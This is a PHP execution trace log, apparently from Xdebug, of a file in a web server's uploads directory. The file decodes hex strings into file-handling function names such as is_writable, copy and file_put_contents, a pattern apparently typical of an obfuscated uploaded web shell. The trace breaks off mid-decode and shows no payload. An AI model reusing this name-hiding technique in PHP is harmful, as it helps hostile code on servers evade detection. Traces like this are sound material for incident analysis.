3	94	0	0.005063	719968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	94	1	0.005074	720016
3	94	R			114
3	95	0	0.005086	719936	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	95	1	0.005097	719976
3	95	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	96	0	0.005130	719968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	96	1	0.005141	720016
3	96	R			97
3	97	0	0.005171	719936	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	97	1	0.005183	719976
3	97	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	98	0	0.005214	719968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	98	1	0.005225	720016
3	98	R			121
3	99	0	0.005237	719936	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	99	1	0.005248	719976
3	99	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	100	0	0.005278	719968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	100	1	0.005290	720016
3	100	R			95
3	101	0	0.005302	719936	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	101	1	0.005313	719976
3	101	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	102	0	0.005344	719968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	102	1	0.005355	720016
3	102	R			100
3	103	0	0.005367	719936	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	103	1	0.005382	719976
3	103	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	104	0	0.005413	719968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	104	1	0.005424	720016
3	104	R			105
3	105	0	0.005437	719936	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	105	1	0.005448	719976
3	105	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	106	0	0.005479	719976	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	106	1	0.005490	720024
3	106	R			102
3	107	0	0.005503	719944	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	107	1	0.005514	719984
3	107	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	108	0	0.005544	719976	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	108	1	0.005555	720024
3	108	R			102
3	109	0	0.005568	719944	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	109	1	0.005579	719984
3	109	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	89	1	0.005608	719944
2	89	R			'array_diff'
1		A						/var/www/html/uploads/lCT.php	7	$func[5] = 'array_diff'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	110	0	0.005643	719944	dehex	1		/var/www/html/uploads/lCT.php	7	1	'69735f646972'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	111	0	0.005684	719976	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	111	1	0.005695	720024
3	111	R			105
3	112	0	0.005708	719944	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	112	1	0.005719	719984
3	112	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	113	0	0.005751	720008	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	113	1	0.005763	720056
3	113	R			115
3	114	0	0.005776	719976	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	114	1	0.005787	720016
3	114	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	115	0	0.005817	720008	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	115	1	0.005829	720056
3	115	R			95
3	116	0	0.005842	719976	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	116	1	0.005853	720016
3	116	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	117	0	0.005884	720008	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	117	1	0.005896	720056
3	117	R			100
3	118	0	0.005909	719976	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	118	1	0.005920	720016
3	118	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	119	0	0.005950	720008	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	119	1	0.005962	720056
3	119	R			105
3	120	0	0.005975	719976	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	120	1	0.005986	720016
3	120	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	121	0	0.006016	720008	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	121	1	0.006028	720056
3	121	R			114
3	122	0	0.006041	719976	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	122	1	0.006052	720016
3	122	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	110	1	0.006083	719976
2	110	R			'is_dir'
1		A						/var/www/html/uploads/lCT.php	7	$func[6] = 'is_dir'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	123	0	0.006116	719976	dehex	1		/var/www/html/uploads/lCT.php	7	1	'69735f66696c65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 13
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	124	0	0.006161	720008	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	124	1	0.006173	720056
3	124	R			105
3	125	0	0.006185	719976	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	125	1	0.006197	720016
3	125	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	126	0	0.006228	720040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	126	1	0.006239	720088
3	126	R			115
3	127	0	0.006252	720008	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	127	1	0.006264	720048
3	127	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	128	0	0.006294	720040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	128	1	0.006306	720088
3	128	R			95
3	129	0	0.006319	720008	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	129	1	0.006330	720048
3	129	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	130	0	0.006360	720040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	130	1	0.006372	720088
3	130	R			102
3	131	0	0.006389	720008	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	131	1	0.006400	720048
3	131	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	132	0	0.006431	720040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	132	1	0.006443	720088
3	132	R			105
3	133	0	0.006455	720008	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	133	1	0.006466	720048
3	133	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	134	0	0.006496	720040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	134	1	0.006508	720088
3	134	R			108
3	135	0	0.006521	720008	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	135	1	0.006532	720048
3	135	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	136	0	0.006562	720040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	136	1	0.006574	720088
3	136	R			101
3	137	0	0.006586	720008	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	137	1	0.006598	720048
3	137	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	123	1	0.006628	720008
2	123	R			'is_file'
1		A						/var/www/html/uploads/lCT.php	7	$func[7] = 'is_file'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	138	0	0.006662	720008	dehex	1		/var/www/html/uploads/lCT.php	7	1	'69735f7772697461626c65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 21
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	139	0	0.006703	720040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	139	1	0.006715	720088
3	139	R			105
3	140	0	0.006727	720008	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	140	1	0.006738	720048
3	140	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	141	0	0.006769	720072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	141	1	0.006780	720120
3	141	R			115
3	142	0	0.006792	720040	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	142	1	0.006803	720080
3	142	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	143	0	0.006834	720072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	143	1	0.006845	720120
3	143	R			95
3	144	0	0.006858	720040	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	144	1	0.006873	720080
3	144	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	145	0	0.006904	720072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'77'
3	145	1	0.006915	720120
3	145	R			119
3	146	0	0.006928	720040	chr	0		/var/www/html/uploads/lCT.php	204	1	119
3	146	1	0.006939	720080
3	146	R			'w'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	147	0	0.006970	720072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	147	1	0.006982	720120
3	147	R			114
3	148	0	0.006994	720040	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	148	1	0.007006	720080
3	148	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	149	0	0.007035	720072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	149	1	0.007047	720120
3	149	R			105
3	150	0	0.007059	720040	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	150	1	0.007070	720080
3	150	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	151	0	0.007100	720072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	151	1	0.007112	720120
3	151	R			116
3	152	0	0.007124	720040	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	152	1	0.007135	720080
3	152	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	153	0	0.007165	720072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	153	1	0.007176	720120
3	153	R			97
3	154	0	0.007189	720040	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	154	1	0.007200	720080
3	154	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	155	0	0.007230	720080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'62'
3	155	1	0.007242	720128
3	155	R			98
3	156	0	0.007255	720048	chr	0		/var/www/html/uploads/lCT.php	204	1	98
3	156	1	0.007265	720088
3	156	R			'b'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	157	0	0.007295	720080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	157	1	0.007307	720128
3	157	R			108
3	158	0	0.007319	720048	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	158	1	0.007330	720088
3	158	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	159	0	0.007360	720080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	159	1	0.007371	720128
3	159	R			101
3	160	0	0.007384	720048	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	160	1	0.007395	720088
3	160	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	138	1	0.007425	720048
2	138	R			'is_writable'
1		A						/var/www/html/uploads/lCT.php	7	$func[8] = 'is_writable'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	161	0	0.007460	720048	dehex	1		/var/www/html/uploads/lCT.php	7	1	'69735f7265616461626c65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 21
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	162	0	0.007501	720080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	162	1	0.007513	720128
3	162	R			105
3	163	0	0.007525	720048	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	163	1	0.007537	720088
3	163	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	164	0	0.007568	720112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	164	1	0.007579	720160
3	164	R			115
3	165	0	0.007591	720080	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	165	1	0.007607	720120
3	165	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	166	0	0.007637	720112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	166	1	0.007649	720160
3	166	R			95
3	167	0	0.007661	720080	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	167	1	0.007673	720120
3	167	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	168	0	0.007703	720112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	168	1	0.007714	720160
3	168	R			114
3	169	0	0.007727	720080	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	169	1	0.007738	720120
3	169	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	170	0	0.007768	720112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	170	1	0.007779	720160
3	170	R			101
3	171	0	0.007791	720080	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	171	1	0.007802	720120
3	171	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	172	0	0.007832	720112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	172	1	0.007844	720160
3	172	R			97
3	173	0	0.007857	720080	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	173	1	0.007868	720120
3	173	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	174	0	0.007898	720112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	174	1	0.007909	720160
3	174	R			100
3	175	0	0.007921	720080	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	175	1	0.007932	720120
3	175	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	176	0	0.007962	720112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	176	1	0.007974	720160
3	176	R			97
3	177	0	0.007987	720080	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	177	1	0.007998	720120
3	177	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	178	0	0.008027	720120	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'62'
3	178	1	0.008039	720168
3	178	R			98
3	179	0	0.008052	720088	chr	0		/var/www/html/uploads/lCT.php	204	1	98
3	179	1	0.008063	720128
3	179	R			'b'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	180	0	0.008092	720120	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	180	1	0.008104	720168
3	180	R			108
3	181	0	0.008116	720088	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	181	1	0.008127	720128
3	181	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	182	0	0.008157	720120	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	182	1	0.008169	720168
3	182	R			101
3	183	0	0.008182	720088	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	183	1	0.008192	720128
3	183	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	161	1	0.008222	720088
2	161	R			'is_readable'
1		A						/var/www/html/uploads/lCT.php	7	$func[9] = 'is_readable'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	184	0	0.008257	720088	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c6573697a65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 15
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	185	0	0.008298	720120	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	185	1	0.008309	720168
3	185	R			102
3	186	0	0.008322	720088	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	186	1	0.008335	720128
3	186	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	187	0	0.008366	720152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	187	1	0.008378	720200
3	187	R			105
3	188	0	0.008390	720120	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	188	1	0.008401	720160
3	188	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	189	0	0.008431	720152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	189	1	0.008443	720200
3	189	R			108
3	190	0	0.008455	720120	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	190	1	0.008466	720160
3	190	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	191	0	0.008496	720152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	191	1	0.008508	720200
3	191	R			101
3	192	0	0.008520	720120	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	192	1	0.008530	720160
3	192	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	193	0	0.008560	720152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	193	1	0.008571	720200
3	193	R			115
3	194	0	0.008584	720120	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	194	1	0.008596	720160
3	194	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	195	0	0.008625	720152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	195	1	0.008636	720200
3	195	R			105
3	196	0	0.008649	720120	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	196	1	0.008660	720160
3	196	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	197	0	0.008690	720152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'7a'
3	197	1	0.008701	720200
3	197	R			122
3	198	0	0.008713	720120	chr	0		/var/www/html/uploads/lCT.php	204	1	122
3	198	1	0.008725	720160
3	198	R			'z'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'z'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	199	0	0.008755	720152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	199	1	0.008766	720200
3	199	R			101
3	200	0	0.008778	720120	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	200	1	0.008789	720160
3	200	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	184	1	0.008819	720128
2	184	R			'filesize'
1		A						/var/www/html/uploads/lCT.php	7	$func[10] = 'filesize'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	201	0	0.008853	720128	dehex	1		/var/www/html/uploads/lCT.php	7	1	'636f7079'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 7
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	202	0	0.008892	720160	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	202	1	0.008904	720208
3	202	R			99
3	203	0	0.008917	720128	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	203	1	0.008927	720168
3	203	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	204	0	0.008958	720192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	204	1	0.008970	720240
3	204	R			111
3	205	0	0.008982	720160	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	205	1	0.008993	720200
3	205	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	206	0	0.009023	720192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	206	1	0.009035	720240
3	206	R			112
3	207	0	0.009047	720160	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	207	1	0.009062	720200
3	207	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	208	0	0.009092	720192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	208	1	0.009104	720240
3	208	R			121
3	209	0	0.009116	720160	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	209	1	0.009127	720200
3	209	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	201	1	0.009175	720160
2	201	R			'copy'
1		A						/var/www/html/uploads/lCT.php	7	$func[11] = 'copy'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	210	0	0.009211	720160	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c655f657869737473'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 21
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	211	0	0.009252	720192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	211	1	0.009264	720240
3	211	R			102
3	212	0	0.009276	720160	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	212	1	0.009288	720200
3	212	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	213	0	0.009319	720224	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	213	1	0.009330	720272
3	213	R			105
3	214	0	0.009342	720192	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	214	1	0.009354	720232
3	214	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	215	0	0.009385	720224	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	215	1	0.009396	720272
3	215	R			108
3	216	0	0.009408	720192	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	216	1	0.009420	720232
3	216	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	217	0	0.009450	720224	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	217	1	0.009461	720272
3	217	R			101
3	218	0	0.009474	720192	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	218	1	0.009485	720232
3	218	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	219	0	0.009515	720224	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	219	1	0.009526	720272
3	219	R			95
3	220	0	0.009539	720192	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	220	1	0.009550	720232
3	220	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	221	0	0.009581	720224	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	221	1	0.009592	720272
3	221	R			101
3	222	0	0.009604	720192	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	222	1	0.009615	720232
3	222	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	223	0	0.009645	720224	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
3	223	1	0.009656	720272
3	223	R			120
3	224	0	0.009668	720192	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	224	1	0.009680	720232
3	224	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	225	0	0.009710	720224	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	225	1	0.009721	720272
3	225	R			105
3	226	0	0.009734	720192	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	226	1	0.009745	720232
3	226	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	227	0	0.009776	720232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	227	1	0.009787	720280
3	227	R			115
3	228	0	0.009800	720200	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	228	1	0.009814	720240
3	228	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	229	0	0.009844	720232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	229	1	0.009856	720280
3	229	R			116
3	230	0	0.009868	720200	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	230	1	0.009879	720240
3	230	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	231	0	0.009909	720232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	231	1	0.009920	720280
3	231	R			115
3	232	0	0.009933	720200	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	232	1	0.009944	720240
3	232	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	210	1	0.009974	720200
2	210	R			'file_exists'
1		A						/var/www/html/uploads/lCT.php	7	$func[12] = 'file_exists'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	233	0	0.010008	720200	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c655f7075745f636f6e74656e7473'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 33
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	234	0	0.010050	720232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	234	1	0.010062	720280
3	234	R			102
3	235	0	0.010074	720200	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	235	1	0.010086	720240
3	235	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	236	0	0.010116	720264	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	236	1	0.010127	720312
3	236	R			105
